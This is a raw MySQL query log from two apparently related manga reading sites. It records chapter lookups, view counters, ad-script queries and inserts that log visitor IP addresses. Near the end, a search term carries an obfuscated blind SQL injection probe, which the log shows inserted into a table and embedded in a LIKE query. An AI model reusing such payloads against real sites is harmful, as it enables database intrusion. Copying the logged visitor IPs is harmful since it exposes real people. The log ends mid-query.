u317079482_mangacherri_2 using Socket 330658564 Query select * FROM chapters where manga_id = '239' order by id desc 330658564 Quit 330658565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658565 Query Update chapters set view=view+1 where id = '12418' 330658565 Quit 330658566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658566 Query select * FROM chapters where id = '12418' 330658567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658567 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12418' 330658566 Quit 330658567 Quit 330658568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658568 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('239', '12418', '15.235.98.126', 'mangacherri.com', '2026-02-26 03:29:56', '2026-02-26 03:29:56') 330658568 Quit 330658569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658569 Query select * FROM chapter_images where chapter_id = '12418' 330658569 Quit 330658570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658570 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '239' and m.active = 1 330658570 Quit 330658571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658571 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='239' and m.active = 1 AND (genres like '%Animals%' OR genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 260225 19:29:57 330658572 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658573 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658572 Quit 330658573 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2099' and m.active = 1 330658573 Quit 330658574 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658574 Query select * FROM chapters where id = '2099' 330658574 Quit 330658575 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658575 Query select * FROM chapters where manga_id = '104' order by display_priority ASC, id desc 330658575 Quit 330658576 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658576 Query Update chapters set view=view+1 where id = '2099' 330658576 Quit 330658577 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658577 Query select * FROM chapters where id = '2099' 330658577 Quit 330658578 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658578 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2099' and m.active = 1 330658578 Quit 330658579 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658579 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('104', '2099', '207.46.13.141', 'mangaberri.com', '2026-02-26 03:29:57', '2026-02-26 03:29:57') 330658579 Quit 330658580 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658580 Query select * FROM chapter_images where chapter_id = '2099' 330658580 Quit 330658581 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658581 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '104' and m.active = 1 330658581 Quit 330658582 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658582 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='104' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Martial Arts%') ORDER BY RAND() limit 10 330658582 Quit 330658583 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658584 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658583 Quit 330658584 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658584 Quit 330658585 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658586 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658585 Quit 330658586 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658586 Quit 330658587 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658588 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658587 Quit 330658588 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658588 Quit 330658589 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658590 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658589 Quit 330658590 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658590 Quit 330658591 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658592 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658591 Quit 330658592 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2251' and m.active = 1 330658592 Quit 330658593 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658593 Query select * FROM chapters where id = '2251' 330658593 Quit 330658594 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658594 Query select * FROM chapters where manga_id = '20' order by display_priority ASC, id desc 330658594 Quit 330658595 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658595 Query Update chapters set view=view+1 where id = '2251' 330658595 Quit 330658596 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658596 Query select * FROM chapters where id = '2251' 330658596 Quit 330658597 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658597 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2251' and m.active = 1 330658597 Quit 330658598 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658598 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('20', '2251', '144.129.52.33', 'mangaberri.com', '2026-02-26 03:29:57', '2026-02-26 03:29:57') 330658598 Quit 330658599 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658599 Query select * FROM chapter_images where chapter_id = '2251' 330658599 Quit 330658600 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658600 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '20' and m.active = 1 330658600 Quit 330658601 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658601 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='20' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Sci-Fi%' OR genres like '%Shounen%' OR genres like '%Space%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330658601 Quit 330658602 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658603 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658602 Quit 330658603 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658603 Quit 330658604 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658605 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658604 Quit 330658605 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658605 Quit 330658606 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658607 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658607 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658606 Quit 330658607 Quit 330658608 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658609 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658608 Quit 330658609 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658609 Quit 330658571 Quit 330658610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658610 Quit 330658611 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658611 Quit 330658612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658612 Quit 330658613 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658613 Quit 330658614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658614 Quit 330658615 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658615 Quit 330658616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658617 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658616 Quit 330658617 Quit 260225 19:29:58 330658618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658619 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15997' 330658618 Quit 330658619 Quit 330658620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658620 Query select * FROM chapters where id = '15997' 330658620 Quit 330658621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658621 Query select * FROM chapters where manga_id = '197' order by id desc 330658621 Quit 330658622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658622 Query Update chapters set view=view+1 where id = '15997' 330658622 Quit 330658623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658623 Query select * FROM chapters where id = '15997' 330658623 Quit 330658624 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658624 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15997' 330658624 Quit 330658625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658625 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '15997', '14.254.169.152', 'mangacherri.com', '2026-02-26 03:29:58', '2026-02-26 03:29:58') 330658625 Quit 330658626 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658626 Query select * FROM chapter_images where chapter_id = '15997' 330658626 Quit 330658627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658627 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330658627 Quit 330658628 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658628 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330658629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658630 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658629 Quit 330658630 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12098' 330658630 Quit 330658631 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658631 Query select * FROM chapters where id = '12098' 330658631 Quit 330658632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658632 Query select * FROM chapters where manga_id = '104' order by id desc 330658632 Quit 330658633 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658633 Query Update chapters set view=view+1 where id = '12098' 330658633 Quit 330658634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658634 Query select * FROM chapters where id = '12098' 330658635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658634 Quit 330658635 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12098' 330658635 Quit 330658636 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658636 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('104', '12098', '193.37.32.171', 'mangacherri.com', '2026-02-26 03:29:58', '2026-02-26 03:29:58') 330658636 Quit 330658637 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658637 Query select * FROM chapter_images where chapter_id = '12098' 330658637 Quit 330658638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658638 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '104' and m.active = 1 330658638 Quit 330658639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658639 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='104' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330658628 Quit 330658640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658640 Quit 330658641 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658641 Quit 330658642 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658642 Quit 330658643 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658643 Quit 330658644 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658644 Quit 330658645 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658645 Quit 330658646 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658647 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658646 Quit 330658647 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658647 Quit 330658648 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658649 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658648 Quit 330658649 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6040' and m.active = 1 330658649 Quit 330658650 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658650 Query select * FROM chapters where id = '6040' 330658650 Quit 330658651 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658651 Query select * FROM chapters where manga_id = '158' order by display_priority ASC, id desc 330658651 Quit 330658652 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658652 Query Update chapters set view=view+1 where id = '6040' 330658652 Quit 330658653 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658653 Query select * FROM chapters where id = '6040' 330658653 Quit 330658654 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658654 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6040' and m.active = 1 330658654 Quit 330658655 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658655 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('158', '6040', '93.180.146.129', 'mangaberri.com', '2026-02-26 03:29:58', '2026-02-26 03:29:58') 330658655 Quit 330658656 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658656 Query select * FROM chapter_images where chapter_id = '6040' 330658656 Quit 330658657 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658657 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '158' and m.active = 1 330658657 Quit 330658658 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658658 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='158' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Mystery%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330658658 Quit 330658659 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658660 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658659 Quit 330658660 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658660 Quit 330658661 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658662 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658661 Quit 330658662 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658662 Quit 330658663 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658664 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658663 Quit 330658664 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658664 Quit 330658665 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658666 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658666 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658665 Quit 330658666 Quit 330658639 Quit 330658667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658667 Quit 330658668 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658668 Quit 330658669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658669 Quit 330658670 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658670 Quit 330658671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658672 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658671 Quit 330658672 Quit 330658673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658673 Quit 330658674 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658674 Quit 260225 19:29:59 330658675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658675 Quit 330658676 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12427' 330658676 Quit 330658677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658677 Query select * FROM chapters where id = '12427' 330658677 Quit 330658678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658678 Query select * FROM chapters where manga_id = '239' order by id desc 330658678 Quit 330658679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658679 Query Update chapters set view=view+1 where id = '12427' 330658679 Quit 330658680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658680 Query select * FROM chapters where id = '12427' 330658680 Quit 330658681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658681 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12427' 330658681 Quit 330658682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658682 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('239', '12427', '2001:550:9801:671e:3921:2f2d:2800:604c', 'mangacherri.com', '2026-02-26 03:29:59', '2026-02-26 03:29:59') 330658682 Quit 330658683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658683 Query select * FROM chapter_images where chapter_id = '12427' 330658683 Quit 330658684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658684 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '239' and m.active = 1 330658684 Quit 330658685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658685 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='239' and m.active = 1 AND (genres like '%Animals%' OR genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330658685 Quit 330658686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658686 Quit 330658687 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658687 Quit 330658688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658688 Quit 330658689 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658689 Quit 330658690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658690 Quit 330658691 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658691 Quit 330658692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658692 Quit 330658693 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658693 Quit 260225 19:30:00 330658694 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658695 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658694 Quit 330658695 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '251' and m.active = 1 330658695 Quit 330658696 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658696 Query select * FROM chapters where id = '251' 330658696 Quit 330658697 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658697 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330658697 Quit 330658698 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658698 Query Update chapters set view=view+1 where id = '251' 330658698 Quit 330658699 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658699 Query select * FROM chapters where id = '251' 330658699 Quit 330658700 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658700 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '251' and m.active = 1 330658700 Quit 330658701 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658701 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '251', '162.219.62.18', 'mangaberri.com', '2026-02-26 03:30:00', '2026-02-26 03:30:00') 330658701 Quit 330658702 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658702 Query select * FROM chapter_images where chapter_id = '251' 330658702 Quit 330658703 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658703 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330658703 Quit 330658704 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658704 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330658704 Quit 330658705 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658706 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658705 Quit 330658706 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658706 Quit 330658707 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658708 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658708 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658707 Quit 330658708 Quit 330658709 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658710 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658709 Quit 330658710 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658710 Quit 330658711 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658712 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658712 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658712 Quit 330658711 Quit 330658713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658713 Quit 330658714 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('1And//3794(2727(sELEct//CaSE//3794//whEN//3794//then//1//ELse//0//enD//fROM//RDBDaTabase)2727) AND d', '169.150.196.30', '2026-02-26 03:30:00') 330658714 Quit 330658715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658715 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%1And//3794(2727(sELEct//CaSE//3794//whEN//3794//then//1//ELse//0//enD//fROM//RDBDaTabase)2727) AND d%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%1And//3794(2727(sELEct//CaSE//3794//whEN//3794//then//1//ELse//0//enD//fROM//RDBDaTabase)2727) AND d%' ) ) 330658715 Quit 330658716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658716 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 